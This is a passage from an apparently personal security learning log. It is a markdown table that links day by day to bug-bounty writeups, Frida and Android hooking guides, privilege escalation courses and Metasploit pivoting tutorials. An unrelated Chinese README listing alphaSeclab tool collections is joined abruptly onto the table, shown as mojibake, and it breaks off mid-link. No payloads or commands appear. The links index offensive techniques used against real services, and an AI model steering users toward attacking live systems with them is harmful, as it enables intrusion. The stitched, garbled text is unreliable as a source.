Introduction to Frida - Writeup </li></ul>](/days/day122.md) **123** | [<ul><li>Getting started with Frida on Android Apps - Writeup </li></ul>](/days/day123.md) **124** | [<ul><li>Exploration of Native Modules on Android with Frida - Writeup </li></ul>](/days/day124.md) **125** | [<ul><li>How to exploit GraphQL endpoint: introspection, query, mutations & tools - Writeup </li></ul>](/days/day125.md) **126** | [<ul><li>DVGA Batch Query Attack GraphQL Exploitation : Part 3 DVGA - Video </li></ul>](/days/day126.md) **127** | [<ul><li>The $16,000 Dev Mistake - Writeup </li></ul>](/days/day127.md) **128** | [<ul><li>FirstBlood : HackEvent BugBountyHunter.com - Reports </li></ul>](/days/day128.md) **129** | [<ul><li>Exploring Native Functions with Frida on Android - Writeup </li></ul>](/days/day129.md) **130** | [<ul><li>Add JNI(C/C++) into your existing Android app - Writeup </li></ul>](/days/day130.md) **131** | [<ul><li>Demystifying Frida - Video </li></ul>](/days/day131.md) **132** | [<ul><li>How to hook Android Native methods with Frida (Noob Friendly) - Writeup </li></ul>](/days/day132.md) **133** | [<ul><li>Instrumenting Native Android Functions using Frida - Writeup </li></ul>](/days/day133.md) **134** | [<ul><li>Forging OAuth tokens using discovered client id and client secret - Writeup </li></ul>](/days/day134.md) **135** | [<ul><li>Getting started with Android NDK: Android Tutorial - Writeup </li></ul>](/days/day135.md) **136** | [<ul><li>Can analyzing javascript files lead to remote code execution? - Writeup</li></ul>](/days/day136.md) **137** | [<ul><li>XML External Entity (XXE) : The Ultimate Guide - Writeup </li></ul>](/days/day137.md) **138** | [<ul><li>Bug Bounty Redacted #3: Hacking APIs & XSS, SQLi, WAF Bypass in a regional web application - Video </li></ul>](/days/day138.md) **139** | [<ul><li>PHP Command Injection ->Time Based SQL $2000 bounty - Writeup</li></ul>](/days/day139.md) **140** | [<ul><li>How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control) - Writeup </li></ul>](/days/day140.md) **141** | [<ul><li>My Bug Bounty Adventure (Fuzzing + Information Disclosure) - Writeup </li></ul>](/days/day141.md) **142** | [<ul><li>Exploiting CRLF Injection can lands into a nice bounty - Writeup </li></ul>](/days/day142.md) **143** | [<ul><li>PayPal IDOR via billing Agreement Token (closed Informative, payment fraud) - Writeup </li></ul>](/days/day143.md) **144** | [<ul><li>How I Hacked NASA to execute arbitrary commands in their server! - Writeup </li></ul>](/days/day144.md) **145** | [<ul><li>SQL injection through HTTP headers - Writeup </li></ul>](/days/day145.md) **146** | [<ul><li>Automate your recon With Censys HOW Pro hacker use Censys - Writeup </li></ul>](/days/day146.md) **147** | [<ul><li>How I Found a companyโ€™s internal S3 Bucket with 41k Files - Writeup </li></ul>](/days/day147.md) **148** | [<ul><li>Bypassing File Upload Restriction using Magic Bytes - Writeup </li></ul>](/days/day148.md) **149** | [<ul><li>Story about more than 3.5 million PII leakage in Yahoo!!! (Using an IOS) - Writeup </li></ul>](/days/day149.md) **150** | [<ul><li>How to find & access Admin Panel by digging into JS files - Writeup </li></ul>](/days/day150.md) **151** | [<ul><li>Solved Lame Box - HTB </li></ul>](/days/day151.md) **152** | [<ul><li>Understanding And Identifying Insecure Deserialization - Writeup </li></ul>](/days/day152.md) **153** | [<ul><li>Dependency Confusion : A Supply Chain Attack - Writeup </li></ul>](/days/day153.md) **154** | [<ul><li>Solved Lame Box - HTB</li></ul>]() **155** | [<ul><li>This is why you shouldnโ€™t trust your Federated Identity Provider - Writeup </li></ul>](https://medium.com/@soufianehabti/this-is-why-you-shouldnt-trust-your-federated-identity-provider-62160f50d8b2) **156** | [<ul><li>If Itโ€™s a Feature!!! Letโ€™s Abuse It for $750 - Writeup</li></ul>](https://medium.com/@shakti.gtp/if-its-a-feature-let-s-abuse-it-for-750-19cfb9848d4b) **157** | [<ul><li>Business Logic Errors - Art of Testing Cards - Writeup</li></ul>](https://shahjerry33.medium.com/business-logic-errors-art-of-testing-cards-4907cfb46a57) **158** | [<ul><li>Hacking Nginx: Best ways - Writeup</li></ul>](https://infosecwriteups.com/hacking-nginx-best-ways-7c576cc17ccc) **159** | [<ul><li>Frida hooking android part 1 - Writeup</li></ul>](https://11x256.github.io/Frida-hooking-android-part-1/) **160** | [<ul><li>Frida hooking android part 2 - Writeup</li></ul>](https://11x256.github.io/Frida-hooking-android-part-2/) **161** | [<ul><li>Frida hooking android part 3 - Writeup</li></ul>](https://11x256.github.io/Frida-hooking-android-part-3/) **162** | [<ul><li>Frida hooking android part 4 - Writeup</li></ul>](https://11x256.github.io/Frida-hooking-android-part-4/) **163** | [<ul><li>Frida hooking android part 5: Bypassing AES encryption - Writeup</li></ul>](https://11x256.github.io/Frida-hooking-android-part-5/) **164** | [<ul><li>Exploiting esoteric android vulnerability - Workshop by Sharan & Sanjay at BSides Ahmedabad 2021 - Video</li></ul>](https://www.youtube.com/watch?v=nr4I1aXii-w) **165** | [<ul><li>Andromeda- GUI based Dynamic Instrumentation Toolkit powered by Frida - Shivang Desai - Video</li></ul>](https://www.youtube.com/watch?v=qOEaA2CNNmU) **166** | [<ul><li>How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook - Writeup</li></ul>](https://infosecwriteups.com/how-i-found-a-critical-bug-in-instagram-and-got-49500-bounty-from-facebook-626ff2c6a853) **167** | [<ul><li>Hacking into WordPress themes for CVEs and Fun - Writeup</li></ul>](https://medium.com/pentesternepal/hacking-into-wordpress-themes-for-cves-and-fun-bdde6c834344) **168** | [<ul><li>Bug Bounty Redacted #4: Writing to S3 buckets & Insecure JWT Implementation - Writeup</li></ul>](https://www.youtube.com/watch?v=F7QvhHJB-ck) **169 - 177** | [<ul><li>Android development - Video</li></ul>](https://www.youtube.com/playlist?list=PLjVLYmrlmjGdDps6HAwOOVoAtBPAgIOXL) **178 - 183** | [<ul><li>Linux 101 - Course</li></ul>](https://academy.tcm-sec.com/p/linux-101) **184 - 189** | [<ul><li>Linux Privilege Escalation for Beginners - Course</li></ul>](https://academy.tcm-sec.com/p/linux-privilege-escalation) 190 | [<ul><li>Admin account takeover via weird Password Reset Functionality - Writeup</li></ul>](https://0xmahmoudjo0.medium.com/admin-account-takeover-via-weird-password-reset-functionality-166ce90b1e58) 191 | [<ul><li>Access control worth $2000 : everyone missed this IDOR+Access control between two admins - Writeup</li></ul>](https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21) 192 | [<ul><li>How I was able edit target websiteโ€™s AWS files from the file upload function? - Writeup</li></ul>](https://infosecwriteups.com/bug-bounty-how-i-was-able-edit-awss-files-from-file-upload-function-cb33bc3bd3a9) 193 | [<ul><li>XXE in Public Transport Ticketing Mobile APP - Writeup</li></ul>](https://infosecwriteups.com/xxe-in-public-transport-ticketing-mobile-app-81ae245c01a1) 194 | [<ul><li>RCE IN EC2 INSTANCE VIA SSH WITH PRIVATE KEY EXPOSED ON PUBLIC GITHUB REPOSITORY โ€“ $XX,000 USD - Writeup</li></ul>](https://omespino.com/write-up-private-bug-bounty-rce-in-ec2-instance-via-ssh-with-private-key-exposed-on-public-github-repository-xx000-usd/) 195 | [<ul><li>How I was able to Regain access to account deleted by Admin leading to $$$ - Writeup</li></ul>](https://rajeshranjan457.medium.com/how-i-was-able-to-regain-access-to-account-deleted-by-admin-leading-to-a2c29025f8cd) 196 | [<ul><li>OAuth Misconfiguration Leads To Pre-Account Takeover - Writeup</li></ul>](https://infosecwriteups.com/oauth-misconfiguration-leads-to-pre-account-takeover-8f94c1ef50be) 197 | [<ul><li>How to find Origin IP - Writeup</li></ul>](https://medium.com/@bobby.S/how-to-find-origin-ip-1f684f459942) 198 | [<ul><li>PII Disclosure of Apple Users ($10k) - Writeup</li></ul>](https://ahmdhalabi.medium.com/pii-disclosure-of-apple-users-10k-d1e3d29bae36) 199 | [<ul><li>Android and Java API : Frida - Documentation</li></ul>](https://learnfrida.info/#android-and-java-api) 200 | [<ul><li>Behind the Bug: Password reset poisoning - Writeup </li></ul>](https://noob3xploiter.medium.com/behind-the-bug-password-reset-poisoning-f5a51d890260) 201 | [<ul><li>Websocket Hijacking to steal Session_ID of victim user - Writeup </li></ul>](https://infosecwriteups.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830) 202 | [<ul><li>How to use Burp Suite Like a PRO? PART โ€“ 1 - Writeup </li></ul>](https://www.pethuraj.com/blog/use-burpsuite-like-a-pro-part-1/) 203 | [<ul><li>Ultimate Tips And Tricks To Find More Cross-Site Scripting Vulnerabilities - Writeup </li></ul>](https://bxmbn.medium.com/ultimate-tips-and-tricks-to-find-more-cross-site-scripting-vulnerabilities-d2913765e2d5) 204 | [<ul><li>Setting iOS App Testing Environment with Burp-suite & Corellium - Writeup </li></ul>](https://medium.com/@prinsharma1999/setting-ios-app-testing-environment-with-burp-suite-corellium-21d6eb82b5ca) 205 | [<ul><li>How I Test For Web Cache Vulnerabilities + Tips And Tricks - Writeup </li></ul>](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9) 206 | [<ul><li>Information Disclosure to Account Takeover - Writeup </li></ul>](https://sunilyedla.medium.com/information-disclosure-to-account-takeover-a21b2b54147a) 207 | [<ul><li>You MUST sanitize PHP mail() inputs โ€” or else RCE! - Writeup </li></ul>](https://infosecwriteups.com/you-must-sanitize-php-mail-inputs-or-else-rce-7ac7ba906dca) 208 | [<ul><li>Mail Server Misconfiguration leads to sending a fax from anyoneโ€™s account on HelloFax (Dropbox BBP) for a bounty of $4,913 - Writeup </li></ul>](https://infosecwriteups.com/mail-server-misconfiguration-leads-to-sending-a-fax-from-anyones-account-on-hellofax-dropbox-bbp-aab3d97ab4e7) 209 | [<ul><li>How to prevent hackers from reverse engineering your Android apps - Writeup </li></ul>](https://proandroiddev.com/how-to-prevent-hackers-from-reverse-engineering-your-android-apps-2981661ab1c2) 210 | [<ul><li>How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty - Writeup </li></ul>](https://infosecwriteups.com/how-this-team-accidentally-found-a-ssrf-in-slack-exposing-aws-credentials-a-4000-bug-bounty-513be19286e) 211 - 212 | [<ul><li>Linux Privilege Escalation - Pentester acacademy bootcamp </li></ul>]() 213 - 214 | [<ul><li>Solve linuxprivesc Room - Tryhackme </li></ul>](https://tryhackme.com/room/linuxprivesc) 215 - 217 | [<ul><li>Frida Scripting Guide for Java - Writeup </li></ul>](https://cmrodriguez.me/blog/frida-scripting-guide/) 218| [<ul><li>Exploring Native Functions with Frida on Android : part 3 - Writeup </li></ul>](https://mobsecguys.medium.com/exploring-native-functions-with-frida-on-android-part-3-45422ae18caa) 219 | [<ul><li>Exploring Native Functions with Frida on Android : part 4 - Writeup </li></ul>](https://medium.com/swlh/exploring-native-functions-with-frida-on-android-part-4-22db2c247e29) 220 | [<ul><li>Stored XSS to Account Takeover : Going beyond document.cookie : Stealing Session Data from IndexedDB - Writeup </li></ul>](https://infosecwriteups.com/stored-xss-to-account-takeover-going-beyond-document-cookie-970e42362f43) 221 | [<ul><li>SQL Injection filter bypass to perform blind SQL Injection - Writeup </li></ul>](http://www.mannulinux.org/2020/09/sql-injection-filter-bypass-to-perform.html) 222 | [<ul><li>Abusing URL Shortners for fun and profit - Writeup </li></ul>](https://infosecwriteups.com/abusing-url-shortners-for-fun-and-profit-c83c67713916 ) 223 | [<ul><li>Android WebView Hacking : Enable WebView Debugging - Writeup </li></ul>](https://infosecwriteups.com/android-webview-hacking-enable-webview-debugging-d292b53f7a63) 224 | [<ul><li>Defeat the HttpOnly flag to achieve Account Takeover : RXSS - Writeup </li></ul>](https://medium.com/@mohamedtarekq/defeat-the-httponly-flag-to-achieve-account-takeover-rxss-c16849d3d192) 225 -230 | [<ul><li>Android App Hacking - Black Belt Edition - Udemy Course </li></ul>](https://www.udemy.com/course/android-app-hacking-black-belt-edition/) 231 | [<ul><li>Solving CTF with Frida : Part 1 - Writeup </li></ul>](https://cmrodriguez.me/blog/hpandro-1/) 232 | [<ul><li>Solving CTF with Frida : Part 2 - Writeup </li></ul>](https://cmrodriguez.me/blog/hpandro-2/) 233 | [<ul><li>Solving CTF with Frida : Part 3 - Writeup </li></ul>](https://cmrodriguez.me/blog/hpandro-3/) 234| [<ul><li>Solving CTF with Frida : Part 4 - Writeup </li></ul>](https://cmrodriguez.me/blog/hpandro-4/) 235 - 240 | [<ul><li>Watched Android CTF video from Youtube channel Umar_0x01 - Video </li></ul>](https://www.youtube.com/c/Umar0x01) 241 | [<ul><li>Bypassing ModSecurity for RCEs - Writeup </li></ul>](https://s0md3v.github.io/blog/modsecurity-rce-bypass) 242 | [<ul><li>Bypassing Amazon WAF to pop an alert() - Writeup </li></ul>](https://infosecwriteups.com/bypassing-amazon-waf-to-pop-an-alert-4646ce35554e) 243 | [<ul><li>Exploiting Androidโ€™s Task Hijacking - Writeup </li></ul>](https://medium.com/mobis3c/android-task-hijacking-6a3a8848f16e) 244 - 248 | [<ul><li>Windows Privilege Escalation for Beginners - TCM Course</li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 249 | [<ul><li>Cool Recon techniques every hacker misses! - Writeup</li></ul>](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89) 250 | [<ul><li>Intruder and CSRF-protected form, without macros - Writeup</li></ul>](https://www.agarri.fr/blog/archives/2020/01/13/intruder_and_csrf-protected_form_without_macros/index.html) 251 | [<ul><li>New technique 403 bypass - Writeup</li></ul>](https://infosecwriteups.com/403-bypass-lyncdiscover-microsoft-com-db2778458c33) 252 | [<ul><li>Exploiting XSS with Javascript/JPEG Polyglot - Writeup</li></ul>](https://systemweakness.com/exploiting-xss-with-javascript-jpeg-polyglot-4cff06f8201a) 253 | [<ul><li>Hacking Android Foreground Services Escalation Of Privileges by Rony Das - Nullcon Goa </li><li> Jailbreaking iOS in the post-apocalyptic era by CoolStar & Tihmstar - Nullcon Goa</li></ul>]() 254 | [<ul><li>Can write single Exploit payload which can exploit both HTML and JS injection - Tweet</li></ul>](https://twitter.com/sec_r0/status/1566470552050716677) 255 | [<ul><li>A context insensitive sqli payload polyglot - Tweet</li></ul>](https://twitter.com/sec_r0/status/1566833869764136962) 256 | [<ul><li>Find References: The most underrated and underused feature of @Burp_Suite - Tweet</li></ul>](https://twitter.com/sec_r0/status/1569008077331959809) 257 | [<ul><li>Reversing an Android sample which uses Flutter - Writeup</li></ul>](https://medium.com/@cryptax/reversing-an-android-sample-which-uses-flutter-23c3ff04b847) 258 - 261 | [<ul><li>Windows Privilege Escalation for Beginners - TCM Course</li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 262 | [<ul><li> Escalation Path Executable Files - WindowsPriv </li><li> Escalation Path Startup Applications - WindowsPriv</li><li> Escalation Path DLL Hijacking - WindowsPriv</li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 263 | [<ul><li>Escalation Path Service Permissions (Paths) - WindowsPriv </li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 264 | [<ul><li>Escalation Path CVE-2019-1388 - WindowsPriv </li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 265-267 | [<ul><li>Capstone Challenge - WindowsPriv </li></ul>](https://academy.tcm-sec.com/p/windows-privilege-escalation-for-beginners) 268-270 | [<ul><li>Wreath Room - Tryhackme </li></ul>](https://tryhackme.com/room/wreath) 271 | [<ul><li>Network Pivoting using Metasploit and Proxychains - Writeup </li></ul>](https://blog.pentesteracademy.com/network-pivoting-using-metasploit-and-proxychains-c04472f8eed0) 272 | [<ul><li>Metasploit: Pivoting - Writeup </li></ul>](https://medium.com/swlh/metasploit-pivoting-281636b23279) 273 - 274| [<ul><li>Explore Hidden Networks With Double Pivoting - Writeup </li></ul>](https://pentest.blog/explore-hidden-networks-with-double-pivoting/) 275 | [<ul><li>Pivoting Entire Network with Chisel - Video </li></ul>](https://www.youtube.com/watch?v=srUUUkcYEwg) 276 | [<ul><li>Deep dive in double network Pivoting with Metasploit and ProxyChains - Video </li></ul>](https://www.youtube.com/watch?v=J-F_3PMbNGo) 277 | [<ul><li>lazyadmin - Tryhackme Room </li></ul>](https://tryhackme.com/room/lazyadmin) 278 | [<ul><li>Empline - Tryhackme Room </li></ul>](https://tryhackme.com/room/empline) 279 | [<ul><li>Vulnnetinternal - Tryhackme Room </li></ul>](https://tryhackme.com/room/vulnnetinternal) 280 | [<ul><li>Gatekeeper - Writeup </li></ul>](https://tryhackme.com/room/gatekeeper) 281 | [<ul><li>Buffer Overflow for #OSCP and #eCPPT in 20 minutes - Video </li></ul>](https://www.youtube.com/watch?v=fSnlhHXRthc) 282 | [<ul><li>Pivoting in Metasploit to Hack Deeper into a Network - Writeup </li></ul>](https://www.hackingloops.com/pivoting-in-metasploit/) 283 - 285 | [<ul><li>Reading Github Repos on ECPPT - Repo </li></ul>](https://github.com/RosePwns/eCPPT_Course_Notes) 286 | [<ul><li>Upgrade Normal Shell To Meterpreter Shell - Writeup </li></ul>](https://infosecwriteups.com/metasploit-upgrade-normal-shell-to-meterpreter-shell-2f09be895646) 287 | [<ul><li>Home Lab: ProxyChains, eCPPT prep - Video </li></ul>](https://www.youtube.com/watch?v=QNoIX1au_CM) 288 | [<ul><li>Pivoting: Metasploit(meterpreter)+Proxychains - Writeup </li></ul>](https://pswalia2u.medium.com/pivoting-metasploit-proxychains-85d18ce5bf2d) 289 | [<ul><li>Metasploit: Portproxy(tunneling meterpreter session inside another meterpreter session)+socat+chisel - Writeup </li></ul>](https://pswalia2u.medium.com/metasploit-portproxy-tunneling-meterpreter-session-inside-another-meterpreter-session-9a99bcf959ac) 290 | [<ul><li>How to Implement Pivoting and Relaying Techniques Using Meterpreter - gitbooks </li></ul>](https://medium.com/axon-technologies/how-to-implement-pivoting-and-relaying-techniques-using-meterpreter-b6f5ec666795) 291 - 292 | [<ul><li>sushant747 - gitbooks </li></ul>](https://sushant747.gitbooks.io/total-oscp-guide/content/linux.html) 293 - 302 | [<ul><li>Going through INE PDF Material </li></ul>]() 303 - 310 | [<ul><li>ECPPT EXam </li></ul>]() 311 | [<ul><li>AWS SSRF to Root on production instance - Writeup </li></ul>](https://logicbomb.medium.com/a-bug-worth-1-75lacs-aws-ssrf-to-rce-8d43d5fda899) 312 | [<ul><li>Weird Vulnerabilities Happening on Load Balancers, Shallow Copies and Caches - Writeup </li></ul>](https://medium.com/dataseries/weird-vulnerabilities-happening-on-load-balancers-shallow-copies-and-caches-9194d4f72322) 313 | [<ul><li>Chaining Path Traversal with SSRF to disclose internal git repo data in a Bank Asset - Writeup </li></ul>](https://blog.niksthehacker.com/chaining-path-traversal-with-ssrf-to-disclose-internal-git-repo-data-in-a-bank-asset-8af4de6f12e) 314 | [<ul><li>Making API Bug Bounties A Breeze! - Writeup </li></ul>](https://medium.com/@harish_nataraj/making-api-bug-bounties-a-breeze-bf6443db5b37) 315 | [<ul><li>Chaining Cache Poisoning To Stored XSS - Writeup </li></ul>](https://nahoragg.medium.com/chaining-cache-poisoning-to-stored-xss-b910076bda4f) 316 | [<ul><li>$6000 with Microsoft Hall of Fame, Microsoft Firewall Bypass, CRLF to XSS, Microsoft Bug Bounty - Writeup </li></ul>](https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922) 317 | [<ul><li>The Zaheck of Android Deep Links! - Writeup </li></ul>](https://infosecwriteups.com/the-zaheck-of-android-deep-links-a5f57dc4ae4c) 318 | [<ul><li>How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags - Writeup </li></ul>](https://infosecwriteups.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37) 319 | [<ul><li>All about: CORS Misconfiguration - Writeup </li></ul>](https://systemweakness.com/all-about-cors-misconfiguration-b8f1831e9f18) 320 | [<ul><li>Winning QR with DOM-Based XSS - Writeup </li></ul>](https://medium.com/@haroonhameed_76621/winning-qr-with-dom-based-xss-bug-bounty-poc-4b4048cf285d) 321 | [<ul><li>JSON Deserialitzation Attack - Writeup </li></ul>](https://medium.com/@s12deff/json-deserialitzation-attack-78255d16187e) 322 | [<ul><li>$250 for Email account enumeration using NameToMail tool - Writeup </li></ul>](https://medium.com/@snoopy101/250-for-email-account-enumeration-using-nametomail-tool-cce02a17ade8) 323 | [<ul><li>How i found 8 vulnerabilities in 24h - Writeup </li></ul>](https://0xm5awy.medium.com/how-i-found-8-vulnerabilities-in-24h-aad3bd5fd487) 324 | [<ul><li>Account Takeovers Believe the Unbelievable - Writeup </li></ul>](https://www.synack.com/blog/account-takeovers-believe-the-unbelievable/) 324 | [<ul><li>Account Takeovers Believe the Unbelievable - Writeup </li></ul>](https://www.synack.com/blog/account-takeovers-believe-the-unbelievable/) 325 | [<ul><li>JSON based XSS - Writeup </li></ul>](https://koumudi-garikipati.medium.com/json-based-xss-84089141c136) 326 | [<ul><li>Domain hacks with unusual Unicode characters - Writeup </li></ul>](https://shkspr.mobi/blog/2018/11/domain-hacks-with-unusual-unicode-characters/) 327 | [<ul><li>Deep Link Exploitation: Introduction & Open/unvalidated Redirection - Writeup </li></ul>](https://medium.com/mobis3c/deep-link-exploitation-introduction-open-unvalidated-redirection-b8344f00b17b) 328 | [<ul><li> Exploiting Android WebView Vulnerabilities - Writeup </li></ul>](https://medium.com/mobis3c/exploiting-android-webview-vulnerabilities-e2bcff780892#6537) 329 | [<ul><li> SSRF via DNS Rebinding CVE-2022โ€“4096 - Writeup </li></ul>](https://infosecwriteups.com/ssrf-via-dns-rebinding-cve-2022-4096-b7bf75928bb2) 330 | [<ul><li> Unique Rate limit bypass worth 1800$ - Writeup </li></ul>](https://infosecwriteups.com/unique-rate-limit-bypass-worth-1800-6e2947c7d972) 331 | [<ul><li> Getting started with Code Review - Security Boat Meetup </li></ul>]() 332 | [<ul><li> Firebase Exploit bug bounty - Writeup </li></ul>](https://medium.com/@damaidec/firebase-exploit-bug-bounty-be63f4dc1e4a) 333 | [<ul><li> A Guide to DNS Takeovers: The Misunderstood Cousin of Subdomain Takeovers - Writeup </li></ul>](https://blog.projectdiscovery.io/guide-to-dns-takeovers/) 334 | [<ul><li> Calculating CVSS - Writeup </li></ul>](https://gupta-bless.medium.com/calculating-cvss-d30b9ef5e941) 335 | [<ul><li> Multiple Vulnerabilities found in Airtel Android Application - Writeup </li></ul>](https://offsec.space/posts/airtel-vulnerabilities/) 336 | [<ul><li> Remote Command Execution in a Bank Server - Writeup </li></ul>](https://medium.com/@win3zz/remote-command-execution-in-a-bank-server-b213f9f42afe) 337 | [<ul><li> How I made $31500 by submitting a bug to Facebook - Writeup </li></ul>](https://medium.com/@win3zz/how-i-made-31500-by-submitting-a-bug-to-facebook-d31bb046e204) 338 | [<ul><li> Manipulating AES Traffic using a Chain of Proxies and Hardcoded Keys - Writeup </li></ul>](https://blog.dixitaditya.com/manipulating-aes-traffic-using-a-chain-of-proxies-and-hardcoded-keys) 339 | [<ul><li> Understanding IMAP/SMTP injection - Writeup </li></ul>](https://gupta-bless.medium.com/understanding-smtp-injection-8de282334bf) 340 | [<ul><li> Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Writeup </li></ul>](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) 341 | [<ul><li> Nuclei v2.8.0 - Fuzz all the way! - Writeup </li></ul>](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-way/) 342 | [<ul><li> Race Condition vulnerability in Azure Video Indexer allowed trial account users use Advance / Premium feature - Writeup </li></ul>](https://blog.agilehunt.com/blogs/security/race-condition-vulnerability-in-azure-video-indexer-allowed-trial-account-users-use-advance-premium-feature) 343 | [<ul><li> Exploiting Missing HSTS - Writeup </li></ul>]( https://medium.com/@ibm_ptc_security/exploiting-missing-hsts-54f8e23ed80b) 344 | [<ul><li> Kony Mobile Frameworks Reverse Engineering Write Up Wreck IT 2022 CTF Quals - Writeup </li></ul>](https://maulvialf.medium.com/write-up-wreckit-3-0-quals-rev-suusamyr-527f3e7a8c4) 345-346 | [<ul><li> JavaScript prototype pollution: practice of finding and exploitation - Writeup </li></ul>](https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2) 347-348 | [<ul><li> How to Hack WebSockets and Socket.io - Writeup </li></ul>](https://www.blackhillsinfosec.com/how-to-hack-websockets-and-socket-io/) 349 | [<ul><li> Doing it the researcherโ€™s way: How I Managed to Get SSTI which lead to arbitrary file reading on One of the Leading Payment Systems in Asia - Writeup </li></ul>](https://medium.com/@jazdprince/doing-it-the-researchers-way-how-i-managed-to-get-ssti-server-side-template-injection-which-66b239ca0104) 350 | [<ul><li> Unusual Cache Poisoning between Akamai and S3 buckets - Writeup </li></ul>](https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/) 351 - 352 | [<ul><li>Infoseccomm event - Event </li></ul>]() 353 | [<ul><li> Param Hunting to Injections - Writeup </li></ul>](https://infosecwriteups.com/param-hunting-to-injections-4365da5447cf) 354 | [<ul><li> How I was able to steal users credentials via Swagger UI DOM-XSS - Writeup </li></ul>](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) 355 | [<ul><li> Understanding Memcache Injection - Writeup </li></ul>](https://infosecwriteups.com/understanding-memcache-injection-d4d8f57595f0) 356 | [<ul><li> GraphQL Pentesting for Dummies! Part-1 - Writeup </li></ul>](https://anugrahsr.in/graphql-pentesting-for-dummies_part1/) 357 - 359| [<ul><li> Gaining Access to Protected Components In Android - Writeup </li><li> Penetrate the Protected Component in Android Part -1 - Writeup </li><li> Penetrate the Protected Component in Android Part -2 - Writeup </li><li>Android Hacking-Exploiting Content Providers</li></ul>](https://www.youtube.com/watch?v=11cscd_okgw&t=2618s&ab_channel=Payatu) 360 | [<ul><li> Hack crypto secrets from heap memory to exploit Android application - Writeup </li></ul>](https://infosecwriteups.com/hack-crypto-secrets-from-heap-memory-to-exploit-android-application-728097fcda3) 361 | [<ul><li> $350 XSS in 15 minutes - Writeup </li></ul>](https://infosecwriteups.com/350-xss-in-15-minutes-dcb74ad93d5f) 362 | [<ul><li> Command-Line Data-Wrangling by Tomnomnom - Video </li></ul>]( https://www.youtube.com/watch?v=QSq-aYYQpro&ab_channel=NahamSec) 363 | [<ul><li> Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000 - Writeup </li></ul>](https://infosecwriteups.com/unauthorized-sign-up-on-subdomain-of-subdomain-leading-to-organization-takeover-worth-2000-a7199952d80b) 364 | [<ul><li> Exploring the World of ESI Injection - Writeup </li></ul>](https://sudhanshur705.medium.com/exploring-the-world-of-esi-injection-b86234e66f91) 365 | [<ul><li> SSRF vulnerabilities caused by SNI proxy misconfigurations - Writeup </li></ul>](https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/)
# ๆ‰€ๆœ‰ๆ”ถ้›†็ฑป้กน็›ฎ: - [ๆ”ถ้›†็š„ๆ‰€ๆœ‰ๅผ€ๆบๅทฅๅ…ท](https://github.com/alphaSeclab/sec-tool-list): ่ถ…่ฟ‡18K, ๅŒ…ๆ‹ฌMarkdownๅ’ŒJsonไธค็งๆ ผๅผ - [้€†ๅ‘่ต„ๆบ](https://github.com/alphaSeclab/awesome-reverse-engineering): IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/Androidๅฎ‰ๅ…จ/iOSๅฎ‰ๅ…จ/Windowๅฎ‰ๅ…จ/Linuxๅฎ‰ๅ…จ/macOSๅฎ‰ๅ…จ/ๆธธๆˆHacking/Bootkit/Rootkit/Angr/Shellcode/่ฟ›็จ‹ๆณจๅ…ฅ/ไปฃ็ ๆณจๅ…ฅ/DLLๆณจๅ…ฅ/WSL/Sysmon/... - [็ฝ‘็ปœ็›ธๅ…ณ็š„ๅฎ‰ๅ…จ่ต„ๆบ](https://github.com/alphaSeclab/awesome-network-stuff): ไปฃ็†/GFW/ๅๅ‘ไปฃ็†/้šง้“/VPN/Tor/I2P๏ผŒไปฅๅŠไธญ้—ดไบบ/PortKnocking/ๅ—…ๆŽข/็ฝ‘็ปœๅˆ†ๆž/็ฝ‘็ปœ่ฏŠๆ–ญ็ญ‰ - [ๆ”ปๅ‡ปๆ€ง็ฝ‘็ปœๅฎ‰ๅ…จ่ต„ๆบ](https://github.com/alphaSeclab/awesome-cyber-security): ๆผๆดž/ๆธ—้€/็‰ฉ่”็ฝ‘ๅฎ‰ๅ…จ/ๆ•ฐๆฎๆธ—้€/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/ๅ…ๆ€/CobaltStrike/ไพฆๆŸฅ/OSINT/็คพๅทฅ/ๅฏ†็ /ๅ‡ญ่ฏ/ๅจ่ƒ็‹ฉ็ŒŽ/Payload/WifiHacking/ๆ— ็บฟๆ”ปๅ‡ป/ๅŽๆธ—้€/ๆๆƒ/UAC็ป•่ฟ‡/... # network-stuff - ่ทŸ็ฝ‘็ปœ็›ธๅ…ณ็š„ๅฎ‰ๅ…จ่ต„ๆบ๏ผŒๅŒ…ๆ‹ฌ๏ผšไปฃ็†/GFW/ๅๅ‘ไปฃ็†/้šง้“/VPN/Tor/I2P๏ผŒไปฅๅŠไธญ้—ดไบบ/PortKnocking/ๅ—…ๆŽข/็ฝ‘็ปœๅˆ†ๆž/็ฝ‘็ปœ่ฏŠๆ–ญ็ญ‰ใ€‚่ถ…่ฟ‡1700ๅผ€ๆบๅฎ‰ๅ…จๅทฅๅ…ทใ€‚็›ธๅ…ณๆ–‡็ซ ๅพ…ๆทปๅŠ ใ€‚ - [English 